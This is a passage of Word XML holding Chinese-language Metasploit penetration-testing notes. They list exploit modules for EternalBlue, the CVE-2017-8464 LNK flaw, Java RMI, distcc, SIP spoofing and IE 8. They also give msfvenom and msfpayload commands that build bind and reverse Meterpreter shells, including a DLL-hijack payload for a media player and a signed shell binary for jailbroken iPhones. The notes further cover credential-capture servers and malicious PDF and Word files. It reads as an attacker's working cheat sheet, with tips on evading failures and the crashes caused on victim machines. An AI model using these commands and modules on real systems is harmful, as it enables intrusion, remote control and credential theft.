          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EC0221" w:rsidRPr="00EC0221">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="595A5C"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC0221">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="595A5C"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>This module takes advantage of the -d flag to set php.ini directives to achieve code execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00746882" w:rsidRDefault="00A6556A" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>CGI作为一个英文缩写，该名词有不同含义，包括</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>通用网关接口</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>计算机合成图像/电脑三维动画</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>计算机图形接口标准</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>全球小区识别码</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6556A" w:rsidRDefault="00A6556A" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00052074" w:rsidRDefault="00052074" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>Java RMI registry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>开在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1099端口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A6556A" w:rsidRDefault="00052074" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00052074">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RMI server的RMI注册表及和激活服务的默认配置存在安全漏洞，可以直接msfconsole来执行代码获取root权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00663596" w:rsidRDefault="00663596" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00052074" w:rsidRDefault="00663596" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00663596">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>Distcc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="002D1214">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对2.x版本</w:t>
      </w:r>
      <w:r w:rsidR="000C3F64">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 攻击端口3632</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00663596" w:rsidRDefault="00583B8D" w:rsidP="00583B8D">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>这是个分布式编译软件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如果配置不严格就会导致命令的执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00663596" w:rsidRDefault="00663596" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004405D3" w:rsidRDefault="004405D3" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>震网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004405D3" w:rsidRDefault="004405D3" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004405D3">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>use exploit/windows/fileformat/cve_2017_8464_lnk_rce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004405D3" w:rsidRDefault="00060314" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msf中利用的方式还不是很稳定，有时候</w:t>
      </w:r>
      <w:r w:rsidR="005F0AFC">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要受害机重启才行。</w:t>
      </w:r>
      <w:r w:rsidR="0008142B">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有时候就是不会启动，还需要自己点击控制面板扩展cpl文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00060314" w:rsidRDefault="00060314" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C2961" w:rsidRDefault="00FF7F2A" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>永恒之蓝</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="0065743A">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007E1027" w:rsidRPr="007E1027">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>Windows 7 and Server 2008 R2 (x64) All Service Packs</w:t>
      </w:r>
      <w:r w:rsidR="0010069B">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>管理员权限攻击</w:t>
      </w:r>
      <w:r w:rsidR="0010069B">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00B1619B">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果开着防火墙，</w:t>
      </w:r>
      <w:r w:rsidR="00D25F04">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r w:rsidR="00B1619B">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会失效</w:t>
      </w:r>
      <w:r w:rsidR="00541D4D">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，只要nmap不能扫出来就会失效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF7F2A" w:rsidRDefault="00FF7F2A" w:rsidP="00FF7F2A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF7F2A">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>auxiliary/scanner/smb/smb_ms17_010</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF7F2A" w:rsidRDefault="00FF7F2A" w:rsidP="00FF7F2A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批量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>扫描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set rhost xxx-xxx</w:t>
      </w:r>
      <w:r w:rsidR="00295A44">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D73F9" w:rsidRDefault="00806D9B" w:rsidP="00806D9B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A0ED093" wp14:editId="776C1B3A">
            <wp:extent cx="5334000" cy="8483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F9" w:rsidRPr="007D4FDC" w:rsidRDefault="004E0F9D" w:rsidP="00806D9B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>如果设置的payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>位数不对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>那么就会成功攻击但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>不一定得到session</w:t>
      </w:r>
      <w:r w:rsidR="003D73F9" w:rsidRPr="007D4FDC">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="007D4FDC">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>但是肯定会对目标机器造成影响，比如说xxx关闭了</w:t>
      </w:r>
      <w:r w:rsidR="00DB77DD">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00EB7602">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>甚至被打的自动重启</w:t>
      </w:r>
      <w:r w:rsidR="00DB77DD">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2961" w:rsidRDefault="009B4BB6" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009B4BB6">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E0F9D" w:rsidRDefault="004E0F9D" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00AC0E1B">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>居然</w:t>
      </w:r>
      <w:r w:rsidR="00AC0E1B">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>还可以自己指定进程名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00295A44" w:rsidRPr="002C2961" w:rsidRDefault="00295A44" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:tab/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lastRenderedPageBreak/>
        <w:t>VOIP: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扫描网络中的SIP服务：auxiliary/scanner/sip/options  得到SIP代理和谓词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枚举SIP服务用户：auxiliary/scanner/sip/enumerator #最好设置一下起始范围与终止范围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伪造VOIP会话请求（类似于短信）：auxiliary/voip/sip_invite_spoof #除了ip还要需要设置分机号码extension。可以设置想要发送的MSG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pen test：exploit/windows/sip/sipxphone_cseq ！！！是的windows的首字母可以不用大写。得到ssh漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRDefault="005D5318" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00061E0B" w:rsidRDefault="00061E0B" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>tcpwrapped</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="001024B1">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 监听端口是514</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00061E0B" w:rsidRDefault="00061E0B" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00061E0B">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以进行爆破，msfconsole的rsh_login</w:t>
      </w:r>
      <w:r w:rsidR="00D95100">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块</w:t>
      </w:r>
      <w:r w:rsidRPr="00061E0B">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001024B1" w:rsidRDefault="001024B1" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似于远程终端款的控制软件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00061E0B" w:rsidRPr="005D5318" w:rsidRDefault="00061E0B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对于Apple设备：</w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>越狱的iphone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假定已经通过漏洞或者欺骗得到ssh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sfvenom -p osx/armle/shell/bind_tcp -f macho &gt; macho_name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然后通过sftp上传到IOS设备,put macho_name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再在ssh连接中因为已经越狱那就是root，所以加上可执行权限chmod +x macho_name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ldid -S macho_name 模拟设备签名过程进行签名，从而在没越狱设备上安装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./macho_name执行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use exploit/multi/handler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set payload osx/armle/shell/bind_tcp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set RHOST xxxip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exploit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exploit/apple_ios/ssh/cydia_default_ssh 攻击jailbroken iphone并且对方的ssh root、mobile账号默认密码没有改变。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苹果设备里面sqlite3 xx.db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照片和视频在/var/mobile/Media/DCIM下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRDefault="005D5318" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007557AF" w:rsidRDefault="007557AF" w:rsidP="007557AF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>针对IE浏览器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007557AF" w:rsidRDefault="007557AF" w:rsidP="007557AF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidRPr="006E28E3">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">or IE 8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C03EDA">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>ms12_004_midi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">  别人使用指定浏览器来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>你的网页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就会造成</w:t>
      </w:r>
      <w:r w:rsidRPr="00001F61">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>winmm.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> 堆溢出攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007557AF" w:rsidRPr="005D5318" w:rsidRDefault="007557AF" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00233499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浏览器攻击：</w:t>
      </w:r>
      <w:r w:rsidR="00F77178">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F77178" w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>auxiliary/server</w:t>
      </w:r>
      <w:r w:rsidR="00233499">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00233499" w:rsidRPr="00057680">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>exploit/windows/browser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use auxiliary/server/browser_autopwn #set uripath /  建立临时渗透可以访问的网站path。也可以是/abc，就要访问/abc  #这个模块会加载很多其他模块等待着别人的访问。结合xss等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRPr="005D5318" w:rsidRDefault="00F77178" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidRPr="005D5318">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>auxiliary/server</w:t>
      </w:r>
      <w:r w:rsidR="006E78C4">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>/capture/</w:t>
      </w:r>
      <w:r w:rsidR="00E95FA3">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">   使用同样页面的社会工程攻击</w:t>
      </w:r>
      <w:r w:rsidR="006500CF">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="006500CF">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>对各种认证的获取</w:t>
      </w:r>
      <w:r w:rsidR="006500CF">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRDefault="005D5318" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F0116" w:rsidRDefault="006F0116" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006F0116" w:rsidRPr="005D5318" w:rsidRDefault="006F0116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文件渗透都在exploit/windows/fileformat下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针对pdf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需要针对阅读软件来下药，脚本支持比较多的是Adobe Reader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lastRenderedPageBreak/>
        <w:t>使用exploit/multi/handler模块监听本地端口来获取Meterpreter，如果你设了payload那这个接收模块也要对应设置。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针对word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漏洞利用可能导致word失去响应甚至系统挂起，所以你要尽快迁移Meterpreter到其他进程与持久化连接。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sfpayload 是个终端命令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针对多媒体软件Media Player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通过msfpayload windows/meterpreter/reverse_https LOHST=本地ip LPORT=443 D &gt; /root/ehtrace.dll #D指定生成一个dll文件。随便搞一个.flv文件（但我觉得是会让播放器联网的文件，因为我们是将dll放在同一个目录下，来让播放器连接我们的443端口，从而获取Meterpreter），这一个flv文件可以是touch出来的。接下来启动处理程序来等待受害人连接就好。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D5318" w:rsidRPr="005D5318" w:rsidRDefault="003043F6" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003043F6">
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>/usr/share/framework2/msfpayload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接执行或者加上-l参数来列出支持生成的payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF0D5D" w:rsidRDefault="003043F6" w:rsidP="005D5318">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hAnsi="宋体" w:cs="宋体"/>
        </w:rPr>
